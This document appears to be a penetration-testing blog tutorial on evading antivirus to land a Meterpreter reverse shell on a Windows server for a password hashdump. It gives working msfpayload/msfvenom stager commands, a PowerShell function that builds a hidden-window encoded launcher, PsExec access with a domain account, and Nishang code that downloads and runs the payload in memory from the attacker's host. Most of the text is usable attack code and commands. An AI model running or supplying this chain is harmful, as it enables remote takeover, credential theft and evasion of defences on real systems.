avoiding AV detection

I'd like to try a more sophisticated way of gathering the hashdump.

With many thanks to:

http://0entropy.blogspot.co.uk/2012/04/powershell-metasploit-meterpreter-and.html

https://www.fishnetsecurity.com/6labs/blog/bypassing-antivirus-powershell

We need three machines for this:

  • Metasploit (Kali)
  • a Windows host with PowerShell (the staging box where the payload is encoded)
  • the final target (Windows Server)

On Kali:

Create a PowerShell meterpreter stager (the psh output is a PowerShell script that allocates memory and starts the x86 payload in-process; port 443 is chosen so the callback looks like HTTPS on the wire):

msfpayload windows/meterpreter/reverse_tcp LHOST=[IP of Kali] LPORT=443 R | msfencode -t psh -a x86

msfpayload and msfencode were removed from Metasploit in 2015; on a current install the equivalent is msfvenom -p windows/meterpreter/reverse_tcp LHOST=[IP of Kali] LPORT=443 -f psh. Either way, start a matching exploit/multi/handler on Kali (same payload, LHOST and LPORT) before the stager runs, otherwise the connection back has nothing to catch it.

On the PowerShell machine

Convert the PS meterpreter script to the format powershell.exe -EncodedCommand expects (base64 of the UTF-16LE bytes of the script):

c:\> powershell
PS c:\> $cmd = 'PASTE THE CONTENTS OF THE PSH SCRIPT HERE'
PS c:\> $u = [System.Text.Encoding]::Unicode.GetBytes($cmd)
PS c:\> $e = [Convert]::ToBase64String($u)
PS c:\> $e

If the psh output contains single quotes they have to be doubled inside the single-quoted string; it is easier to save the msfencode output to a file and load it with Get-Content -Raw. Note that the base64 string by itself is not a runnable script: it only does something when handed to powershell.exe -EncodedCommand, so a file that contains nothing but the blob is echoed, not executed, when it is run as a script. Put the output (wrapped as a one-line powershell.exe -EncodedCommand launcher, or the raw psh script itself) as a file into a web server directory on Kali and make sure you can access/download it.
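As an added example (not from the original post or from the linked blogs), here is a PowerShell function that does the conversion above from a file, checks that the encoding round-trips, and writes a one-line launcher that is itself valid PowerShell, so the staged file starts the payload whether it is run from disk or fed to Invoke-Expression. The paths .\meterpreter.ps1 and .\ps.txt and the function name are assumptions.

```powershell
# Added example, not code from the original page or from Nishang/Metasploit.
# Turns the msfencode -t psh output into a -EncodedCommand launcher file that
# Download-Execute-PS can run, and verifies the encoding before it is staged.
# Assumptions: the psh output was saved as .\meterpreter.ps1, the launcher goes
# to .\ps.txt for copying into the Kali web root.

function ConvertTo-EncodedLauncher {
    [CmdletBinding()]
    Param(
        [Parameter(Mandatory = $true)] [string] $ScriptPath,
        [Parameter(Mandatory = $true)] [string] $OutFile
    )

    # -Raw keeps the whole script as one string (no per-line splitting);
    # -EncodedCommand expects base64 of the UTF-16LE ("Unicode") bytes.
    $cmd   = Get-Content -Path $ScriptPath -Raw
    $bytes = [System.Text.Encoding]::Unicode.GetBytes($cmd)
    $e     = [Convert]::ToBase64String($bytes)

    # Round-trip check: decode it again and compare before shipping it anywhere.
    $decoded = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($e))
    if ($decoded -ne $cmd) {
        throw "base64 round-trip failed for $ScriptPath"
    }

    # CreateProcess limits a command line to 32767 characters; a big psh payload
    # (base64 grows it by ~2.7x over the source text) can run into that.
    if ($e.Length -gt 30000) {
        Write-Warning "Encoded command is $($e.Length) chars; it may exceed the command-line limit"
    }

    # The launcher line is valid PowerShell on its own: executing ps.txt as a script
    # (what Download-Execute-PS does) spawns the child with the encoded stager.
    $launcher = "powershell.exe -NoProfile -NonInteractive -WindowStyle Hidden -EncodedCommand $e"
    Set-Content -Path $OutFile -Value $launcher -Encoding ASCII
    return $launcher
}

# Usage (assumed paths): writes .\ps.txt and echoes the launcher line
ConvertTo-EncodedLauncher -ScriptPath .\meterpreter.ps1 -OutFile .\ps.txt
```

Copy ps.txt into the Kali web root and fetch it once from the staging box with a browser or Invoke-WebRequest to confirm the file is served as-is (one line, no HTML wrapper) before pointing the target at it.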
Now get to the target with PsExec (it prompts for jdoe's password):
c:\> psexec \\[Target] -u domain\jdoe cmd.exe
In that shell start powershell and define the script below, which downloads your script from Kali and executes it in memory (thanks to Nishang):
function Download-Execute-PS
{
<#
.SYNOPSIS
Nishang payload which downloads and executes a PowerShell script.

.DESCRIPTION
This payload downloads a PowerShell script from the specified URL and then executes it on the target.
Use the -nodownload switch to avoid saving the script on the target. Otherwise, the script is saved with a random filename.

.PARAMETER ScriptURL
The URL from which the PowerShell script is downloaded.

.PARAMETER Arguments
The arguments (typically a function name) to run after the script has been loaded with -nodownload.
This is needed when the script only defines a function in memory, which is true for most scripts in Nishang.

.PARAMETER Nodownload
If this switch is used, the script is not written to disk.

.EXAMPLE
PS > Download-Execute-PS http://pastebin.com/raw.php?i=jqP2vJ3x

.EXAMPLE
PS > Download-Execute-PS http://script.alteredsecurity.com/evilscript.ps1 -Arguments evilscript -nodownload
The above command does not write the script file to disk and executes the evilscript function defined inside evilscript.ps1

.LINK
http://labofapenetrationtester.com/
https://github.com/samratashok/nishang
#>
    [CmdletBinding()] Param(
        [Parameter(Position = 0, Mandatory = $True)]
        [String]
        $ScriptURL,

        [Parameter(Position = 1, Mandatory = $False)]
        [String]
        $Arguments,

        [Switch]
        $nodownload
    )
    if ($nodownload -eq $true)
    {
        # In-memory path: fetch the script text and evaluate it in this process,
        # then run the function it defined if one was named in -Arguments
        Invoke-Expression ((New-Object Net.WebClient).DownloadString("$ScriptURL"))
        if($Arguments)
        {
            Invoke-Expression $Arguments
        }
    }
    else
    {
        # On-disk path: save to %TEMP%\<random>.ps1 (this touches disk, so AV gets
        # a chance to scan it), run it in a child powershell.exe with the execution
        # policy bypassed, and evaluate whatever that child writes to stdout as well
        $rand = Get-Random
        $webclient = New-Object System.Net.WebClient
        $file1 = "$env:temp\$rand.ps1"
        $webclient.DownloadFile($ScriptURL,"$file1")
        $script:pastevalue = powershell.exe -ExecutionPolicy Bypass -noLogo -command $file1
        Invoke-Expression $pastevalue
    }
}
Call the function to download and run your reverse shell (without -nodownload the file is first written to %TEMP% on the target; add -nodownload to keep it in memory, which is the point of the exercise):
Download-Execute-PS http://[Kali]/ps.txt
Go back to the handler on Kali and enjoy the reverse shell....